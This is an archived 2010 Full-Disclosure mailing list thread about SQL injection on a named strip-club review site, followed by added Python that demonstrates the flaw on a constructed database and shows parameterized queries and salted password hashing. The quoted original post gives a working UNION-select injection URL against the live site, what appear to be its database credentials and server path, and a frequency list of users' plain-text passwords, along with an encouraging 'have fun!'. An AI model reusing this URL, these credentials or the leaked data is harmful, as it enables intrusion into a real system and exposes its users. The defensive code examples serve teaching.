Open Source and information security mailing list archives
Date: Fri, 3 Sep 2010 20:37:56 +0000
From: Ben <iluv2cane@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list

Worked in Firefox....
If you see the title bar stating 3,8,
that's the union select ;)
Also, per this page: http://www.tuscl.net/contact-login.php

Recently we lost a week's worth of user data. We believe it was the work of
hackers, and have tightened our security measures.


On Fri, Sep 3, 2010 at 8:32 PM, Jhfjjf Hfdsjj <taser3000@...oo.com> wrote:

>
> Well, one thing I will point out is that the link you submitted for the
> actual SQL injection doesn't seem to work. Either they fixed it or you messed
> up the link.
> ------------------------------
> *From:* Ben <iluv2cane@...il.com>
> *To:* full-disclosure@...ts.grok.org.uk
> *Sent:* Fri, September 3, 2010 11:09:04 AM
> *Subject:* [Full-disclosure] Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list
>
> I found many sql injections on Tuscl.net (The ultimate strip club list)
>
> I tried notifying the site, no response. The server is run on VMware, so
> anything that is done to it is restored upon reboot.
>
> This is a dump of usernames passwords and emails for the site. They are in
> plain text. I have removed records that had the system generated password
> that the user never changed.
>
> http://www.tuscl.net/c.php?CID=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
>
> Common Passwords and the number of accounts that shared them
>
> password - 269
> 123456 - 173
> tuscl - 84
> stripper - 67
> qwerty - 62
> 12345 - 49
> 12345678 - 47
> 1234 - 42
> baseball - 36
> monkey - 36
> princess - 34
> stripclub - 33
> strip - 32
> jennifer - 32
> abc123 - 32
> mustang - 31
> pussy - 29
> lapdance - 27
> andrew - 27
> jmh1978 - 27
> letmein - 27
> fuckyou - 27
> 696969 - 27
> michelle - 26
> harley - 25
> dallas - 25
> 111111 - 25
> shadow - 24
> corvette - 24
> trustno1 - 24
> sunshine - 22
> dragon - 21
> jordan - 21
> love - 21
> butthead - 20
> batman - 20
> danielle - 20
> buster - 20
> password1 - 20
> hello - 20
> biteme - 20
> gaydar - 20
> Michael - 19
> george - 19
> hockey - 19
> ginger - 19
> 6969 - 19
> Bandit - 19
> lasvegas - 18
> taylor - 18
> tigger - 18
> yankees - 18
> chicago - 18
> fucker - 18
> blahblah - 17
> football - 17
> 1escobar2 - 17
> 1111 - 17
> Jessica - 17
> 123456789 - 16
> testing - 16
> phoenix - 16
> badboy - 16
> gemini - 16
> ranger - 16
> heather - 15
> gateway - 15
> secret - 15
> welcome - 15
> 654321 - 15
> aaaaaa - 15
> tennis - 15
> asshole - 15
> maggie - 14
> pepper - 14
> charlie - 14
> golfer - 14
> strippers - 14
> redskins - 14
> summer - 14
> peanut - 14
> chicken - 13
> jeremy - 13
> hunter - 13
> m0ntlure - 13
> fuckoff - 13
> dancer - 13
> bitch - 13
> lucky - 13
> whatever - 13
> killer - 13
> prince - 13
> robert - 13
> orange - 13
> thomas - 13
> hawaii - 12
> redsox - 12
> tiger - 12
> titties - 12
> gators - 12
> florida - 12
> kitten - 12
> austin - 12
> merlin - 12
> canada - 12
> diamond - 12
> boston - 12
> master - 12
> yellow - 12
> falcon - 12
> jasmine - 12
> 1234567 - 12
> cookie - 12
> superman - 12
> midnight - 12
> blowme - 12
> jackass - 12
> sparky - 12
> peekaboo - 11
> doctor - 11
> brandy - 11
> 8675309 - 11
> madison - 11
> braves - 11
> brooklyn - 11
> money - 11
> anthony - 11
> samantha - 11
> ashley - 11
> lucky1 - 11
> amanda - 11
> booboo - 11
> SOCCER - 11
> tarheels - 11
> bigdog - 11
> pookie - 11
> private - 11
> tiffany - 11
> martin - 11
> silver - 11
> lakers - 10
> eatme - 10
> junior - 10
> platinum - 10
> sex - 10
> iloveyou - 10
> nicole - 10
> vegas - 10
> wolfpack - 10
> 55555555 - 10
> barney - 10
> melissa - 10
> molly - 10
> passw0rd - 10
> sexy - 10
> nascar - 10
> dietcoke - 10
> chris - 10
> boomer - 10
> test123 - 10
> johnny - 10
> red123 - 10
> asdfgh - 10
> ncc1701 - 10
> 314159 - 10
> internet - 10
> jackson - 10
> computer - 10
> peaches - 10
> horny - 10
> sierra - 10
> rush2112 - 10
>
> Here is the complete list of email addresses registered. The site had no
> validation, so I am sure some are fake.
>
> The path to the working directory is: /home/httpd/vhosts/tuscl.net/httpdocs/
>
> The SQL information is
> "localhost" - "tuscl" - "szg4wpl9"
>
> Also if you want to look at all the nudey photos uploaded here is where
> they are
> http://www.tuscl.net/pictures/
>
> There are other sites that could have been compromised as well:
> vanjonesthinksimanasshole.com
> tuscl.com
> onerun.com
> ecampguide.com (contains another 1200 plain text passwords)
> troopedge.com
>
> Well have fun!
> Owner or media, if you want to get ahold of me:
> auto595158@...hmail.com
>
>

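The `c.php?CID=-1 union select 1,2,3,...` link in the thread only works because the CID parameter is pasted into the SQL text. Below is an added example (not code from the thread or from the site) that reproduces that defect against a constructed in-memory SQLite schema and shows the parameterized form beside it; the table and column names are assumptions, since the real schema is not in the post.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the site's database (table and
    column names are assumptions; the real schema is not in the thread)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE clubs (cid INTEGER, name TEXT, city TEXT);
        CREATE TABLE users (username TEXT, password TEXT, email TEXT);
        INSERT INTO clubs VALUES (1, 'Club One', 'Dallas');
        INSERT INTO users VALUES ('alice', 'password', 'alice@example.invalid');
    """)
    return db


def club_vulnerable(db, cid):
    # The request parameter is concatenated into the statement, so a value of
    # "-1 union select ..." becomes SQL: the pattern behind the c.php?CID= link.
    sql = "SELECT cid, name, city FROM clubs WHERE cid = " + cid
    return db.execute(sql).fetchall()


def club_parameterized(db, cid):
    # Validate the type first, then bind the value; the driver never treats
    # a bound parameter as SQL text, whatever it contains.
    try:
        cid_int = int(cid)
    except (TypeError, ValueError):
        raise ValueError("CID must be an integer")
    rows = db.execute("SELECT cid, name, city FROM clubs WHERE cid = ?", (cid_int,))
    return rows.fetchall()


# Constructed payload in the shape the thread shows: a negative id so the real
# query matches nothing, then a UNION with the same column count as the page.
PAYLOAD = "-1 union select username, password, email from users"

if __name__ == "__main__":
    db = make_db()
    print(club_vulnerable(db, PAYLOAD))  # the users row comes back in place of a club
    try:
        club_parameterized(db, PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```

The "3,8" Ben mentions seeing in the title bar is the same mechanism: the numbered placeholder columns of the UNION land wherever the page renders those fields.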

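The frequency list in the original post ("password - 269", "123456 - 173", ...) could only be produced because every password was stored as the literal string. As an added example (not code from the thread), the snippet below stores passwords with PBKDF2-HMAC-SHA256 and a per-user random salt, and runs the same "accounts that shared them" tally over a constructed sample both ways; the iteration count is an assumption.

```python
import hashlib
import hmac
import os
from collections import Counter

ITERATIONS = 100_000  # PBKDF2 work factor (assumption; tune for your hardware)


def hash_password(password, salt=None):
    """Return 'salt$digest' (hex): PBKDF2-HMAC-SHA256 with a per-user random salt."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(digest.hex(), digest_hex)


def shared_counts(stored_values):
    """The post's tally: how many stored records are identical, largest first."""
    return [n for _, n in Counter(stored_values).most_common()]


# Constructed accounts echoing the top entries of the thread's frequency list.
SAMPLE = [("u1", "password"), ("u2", "password"), ("u3", "123456"), ("u4", "tuscl")]


def tally_plaintext():
    # Plain-text storage: identical passwords are visible as identical records.
    return shared_counts([pw for _, pw in SAMPLE])


def tally_hashed():
    # Salted hashes: the same password yields a different record per user, so
    # a dump no longer reveals which accounts share one.
    return shared_counts([hash_password(pw) for _, pw in SAMPLE])


if __name__ == "__main__":
    print("plain text:", tally_plaintext())
    print("salted PBKDF2:", tally_hashed())
```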
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/